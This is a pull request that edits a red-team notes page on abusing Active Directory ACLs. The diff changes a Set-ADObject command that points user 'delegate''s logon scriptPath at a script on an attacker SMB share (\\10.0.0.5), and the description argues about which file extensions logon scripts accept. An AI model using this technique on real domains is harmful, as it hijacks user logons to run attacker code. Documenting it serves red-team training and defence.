### PR TITLE
Update abusing-active-directory-acls-aces.md

### DIFF
--- a/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces.md
+++ b/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces.md
@@ -190,7 +190,8 @@ Get-ObjectAcl -ResolveGUIDs -SamAccountName delegate | ? {$_.IdentityReference -
 `WriteProperty` on an `ObjectType`, which in this particular case is `Script-Path`, allows the attacker to overwrite the logon script path of the `delegate` user, which means that the next time, when the user `delegate` logs on, their system will execute our malicious script:
 
 ```csharp
-Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1"
+Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.bat"
+Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.exe"
 ```
 
 Below shows the user's ~~`delegate`~~ logon script field got updated in the AD:


### PR DESCRIPTION
ScriptPath ([scriptPath](https://learn.microsoft.com/en-us/windows/win32/adschema/a-scriptpath)/[msTSInitialProgram](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-ada2/7f65d267-8a3f-4070-b94a-111e793d4821)) does NOT support `PowerShell` files, see the below links for more on what extensions can it run:

- https://redmondmag.com/articles/2016/02/09/logon-scripts-for-active-directory.aspx 
- https://www.rlmueller.net/LogonScriptFAQ.htm#What%20languages%20can%20I%20use%20for%20logon%20scripts

And by the way, the image you provide after writing "Below shows the user's delegate logon script field got updated in the AD:" has the extension of the file set. Regardless of it being `.ps1`, and even if it was, say `.bat`/`.exe`: it most probably won't never work. From my personal testing, when setting this attribute from ADUC, I always take out the extension (otherwise, it fails to execute).